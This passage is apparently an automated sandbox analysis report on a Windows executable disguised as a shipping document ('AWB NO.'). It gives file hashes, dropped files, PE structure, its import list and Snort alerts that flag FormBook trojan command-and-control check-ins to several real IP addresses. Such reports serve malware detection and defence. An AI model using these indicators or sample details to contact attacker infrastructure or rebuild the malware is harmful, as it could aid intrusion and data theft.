                                                            SHA-256:20A7818AB406DC49055B355F60FDF7F70687C2090FFBDDDDE2E346E543BB5776
                                                            SHA-512:F4EDEF7F71B285F3904A8BEAFAEF35C3DAE6F5CD812025F4FE9E3BD7EE2AD51FAE068A5DDBBB9E3ECD0F9D574FACFD0A1CCA5B250896CF50B52B3EC62094AC1E
                                                            Malicious:false
                                                            Preview:...b.RCB1i.X...~.06....2D...L3VBM05RCB11LBQNL3VBM05RCB11LB.NL3X].>5.J...M..o.[?1m@G=$0P\l!0 "\"b/U. 6,.X"b....;-)U._NH.1LBQNL3/CD..2$..Q+.l.+.L....2$.+..m.+.L....2$.cX/*l.+.VBM05RCBatLB.OM3d8Mh5RCB11LB.NN2]CF05.GB11LBQNL3.WM05BCB1QHBQN.3VRM05PCB71LBQNL3PBM05RCB1QHBQLL3VBM07R..11\BQ^L3VB]05BCB11LBANL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3x6(HARCBEzHBQ^L3V.I05BCB11LBQNL3VBM0.RC"11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB11LBQNL3VBM05RCB

                                                            C:\Users\user\AppData\Local\Temp\autF72D.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):9840
                                                            Entropy (8bit):7.600122076467165
                                                            Encrypted:false
                                                            SSDEEP:192:65jwEiqxwzMZTG3c6Vg0X9O1JZUv3QfyYxvoIMnxb1/9Zmss7Eg5L8p7e+ZEXP:I6qxwzMZy3QU9Obysvojx5fm+G0U
                                                            MD5:33D117459E16755B694CA5687287AA0E
                                                            SHA1:3E1CA739F706A336A6C2C0DDE362831378A6AEDC
                                                            SHA-256:573415479CB805C43F597D019C685F5E6F16F15F8D3CE153095B850359553950
                                                            SHA-512:9C29646229D0BA98B5EF189D000CEC4457B3E5BF175EB59DB98A2940631A5C47F490E7D4A6516B727C06B326974FB63E120C0F5BBE5371BE39ED2790772DE70B
                                                            Malicious:false
                                                            Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.134244971800032
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:AWB NO. 077-57676135055.exe
                                                            File size:1'182'720 bytes
                                                            MD5:d0aa9dae95ef6311340a157817230bf0
                                                            SHA1:80019b077b5c1ded0b6485443100c66e94d92e3a
                                                            SHA256:089fa75d9d15b2c8abbaf0daf126b72c8e22dbddb31f56e50f4a19c90065b10f
                                                            SHA512:db4f9fbef67a609c385c84200f943cd1613122711130a1d2ae04dcece7b156b9df64c22230934cc44b358ac5c4357f406afd06c696db198fc7dafa603a852890
                                                            SSDEEP:24576:3AHnh+eWsN3skA4RV1Hom2KXMmHah+tMVkGWioush1i75:qh+ZkldoPK8Yah++DWDu
                                                            TLSH:A845BE02B3D5D036FFAB92739B6AF60156BC79254123852F13981DB9BD701B2223E763
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                            File Icon

                                                            Icon Hash:aaf3e3e3938382a0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x42800a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x668532B9 [Wed Jul 3 11:15:05 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F7248B9041Dh
                                                            jmp 00007F7248B831D4h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007F7248B8335Ah
                                                            cmp edi, eax
                                                            jc 00007F7248B836BEh
                                                            bt dword ptr [004C41FCh], 01h
                                                            jnc 00007F7248B83359h
                                                            rep movsb
                                                            jmp 00007F7248B8366Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007F7248B83524h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007F7248B83360h
                                                            bt dword ptr [004BF324h], 01h
                                                            jc 00007F7248B83830h
                                                            bt dword ptr [004C41FCh], 00000000h
                                                            jnc 00007F7248B834FDh
                                                            test edi, 00000003h
                                                            jne 00007F7248B8350Eh
                                                            test esi, 00000003h
                                                            jne 00007F7248B834EDh
                                                            bt edi, 02h
                                                            jnc 00007F7248B8335Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007F7248B83363h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007F7248B833B5h
                                                            bt esi, 03h

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ASM] VS2013 build 21005
                                                            • [ C ] VS2013 build 21005
                                                            • [C++] VS2013 build 21005
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2013 UPD5 build 40629
                                                            • [RES] VS2013 build 21005
                                                            • [LNK] VS2013 UPD5 build 40629

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x565c4.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x11f0000x7134.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xc80000x565c40x5660009a0316e32a7b582eb07e1e6fb078c2bFalse0.9244273471418234data7.885535704113852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x11f0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                            RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                            RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                            RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                            RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                            RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                            RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                            RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                            RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                            RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                            RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                            RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                            RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                            RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                            RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                            RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                            RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                            RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                            RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                            RT_RCDATA0xd07b80x4d88adata1.000333776269137
                                                            RT_GROUP_ICON0x11e0440x76dataEnglishGreat Britain0.6610169491525424
                                                            RT_GROUP_ICON0x11e0bc0x14dataEnglishGreat Britain1.25
                                                            RT_GROUP_ICON0x11e0d00x14dataEnglishGreat Britain1.15
                                                            RT_GROUP_ICON0x11e0e40x14dataEnglishGreat Britain1.25
                                                            RT_VERSION0x11e0f80xdcdataEnglishGreat Britain0.6181818181818182
                                                            RT_MANIFEST0x11e1d40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                            Imports

                                                            DLLImport
                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                            PSAPI.DLLGetProcessMemoryInfo
                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                            UxTheme.dllIsThemeActive
                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishGreat Britain

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            07/03/24-17:38:41.597037TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980780192.168.11.2044.227.65.245
                                                            07/03/24-17:35:53.379726TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978580192.168.11.20199.59.243.226
                                                            07/03/24-17:38:49.790857TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981080192.168.11.2044.227.65.245
                                                            07/03/24-17:39:03.353831TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981480192.168.11.203.33.130.190
                                                            07/03/24-17:41:04.604431TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982080192.168.11.203.33.130.190
                                                            07/03/24-17:41:04.604431TCP2856318ETPRO TROJAN FormBook CnC Checkin (POST) M44982080192.168.11.203.33.130.190
                                                            07/03/24-17:38:55.322060TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981180192.168.11.203.33.130.190
                                                            07/03/24-17:35:19.814648TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977580192.168.11.20142.202.6.230
                                                            07/03/24-17:38:30.629728TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980480192.168.11.20172.67.146.224
                                                            07/03/24-17:37:44.983410TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979180192.168.11.2066.235.200.145
                                                            07/03/24-17:41:56.990093TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983480192.168.11.20199.59.243.226
                                                            07/03/24-17:37:52.995920TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979480192.168.11.2066.235.200.145
                                                            07/03/24-17:38:01.880492TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979680192.168.11.20103.120.176.124
                                                            07/03/24-17:39:20.021413TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981680192.168.11.2084.32.84.192
                                                            07/03/24-17:34:51.075295TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977380192.168.11.2074.208.236.38
                                                            07/03/24-17:41:49.018292TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983280192.168.11.2074.208.236.230
                                                            07/03/24-17:35:48.040883TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978380192.168.11.20199.59.243.226
                                                            07/03/24-17:41:59.662463TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983580192.168.11.20199.59.243.226
                                                            07/03/24-17:38:58.004159TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981280192.168.11.203.33.130.190
                                                            07/03/24-17:37:31.398547TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978780192.168.11.203.33.130.190
                                                            07/03/24-17:37:58.967654TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979580192.168.11.20103.120.176.124
                                                            07/03/24-17:41:46.335352TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983180192.168.11.2074.208.236.230
                                                            07/03/24-17:38:22.262574TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24980280192.168.11.20203.161.50.127
                                                            07/03/24-17:41:12.622332TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982380192.168.11.203.33.130.190
                                                            07/03/24-17:38:35.975142TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24980680192.168.11.20172.67.146.224
                                                            07/03/24-17:41:26.425379TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982580192.168.11.20142.202.6.230
                                                            07/03/24-17:35:25.248405TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977780192.168.11.20142.202.6.230
                                                            07/03/24-17:35:45.371922TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978280192.168.11.20199.59.243.226
                                                            07/03/24-17:39:17.207076TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981580192.168.11.2084.32.84.192
                                                            07/03/24-17:39:25.651052TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981880192.168.11.2084.32.84.192
                                                            07/03/24-17:38:14.032249TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979980192.168.11.20203.161.50.127
                                                            07/03/24-17:42:02.330769TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983680192.168.11.20199.59.243.226
                                                            07/03/24-17:38:07.702914TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979880192.168.11.20103.120.176.124
                                                            07/03/24-17:41:21.068289TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982480192.168.11.2074.208.236.38
                                                            07/03/24-17:41:43.646684TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983080192.168.11.2074.208.236.230
                                                            07/03/24-17:38:16.781913TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980080192.168.11.20203.161.50.127
                                                            07/03/24-17:38:44.325926TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980880192.168.11.2044.227.65.245
                                                            07/03/24-17:41:29.155995TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982680192.168.11.20142.202.6.230
                                                            07/03/24-17:41:40.953569TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982980192.168.11.2074.208.236.230
                                                            07/03/24-17:37:34.078991TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978880192.168.11.203.33.130.190
